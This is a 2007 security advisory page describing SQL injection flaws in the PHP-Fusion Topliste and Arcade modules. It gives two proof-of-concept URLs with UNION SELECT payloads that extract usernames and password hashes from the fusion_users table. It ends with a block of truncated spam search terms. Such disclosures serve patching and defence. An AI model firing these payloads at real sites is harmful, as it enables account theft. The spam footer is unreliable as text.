about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHP-Fusion Multiple Modules Index.PHP SQL Injection Vulnerabilities


Title PHP-Fusion Multiple Modules Index.PHP SQL Injection Vulnerabilities
Published 2007-04-02-12:00AM
Updated 2007-04-03-05:02PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  xoron is credited with the discovery of these vulnerabilities.
Vulnerable  PHPFusion Topliste 1.0
PHPFusion Arcade Module 1.0
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available.

http://www.example.com/index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
http://www.example.com/index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 17:42:35 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.hb130. www.Badjoj www.indian www.sex wo http:/play WWW.PLAYWO windows vu cmps http:/www. Sex vedio news+for+c Man+and+gi all cartoo sex vedio news+for+c phpRaid news for c www.cyhgtl free mallu phpRaid paypal exp vuln/explo www.worlds Turkis tee news for c youprone Man+and+gi indiansexs never talk www.russia 113231 s s c hall news for c php-nuke 2 sexanimal Www.sexfam 89 Com sex Quick Heal Freesexvid www.indian antivurus indiansexv 217.66.226 Www.sexy g squery Videos bok plesk 8 news for c ve videosd PHP Advanc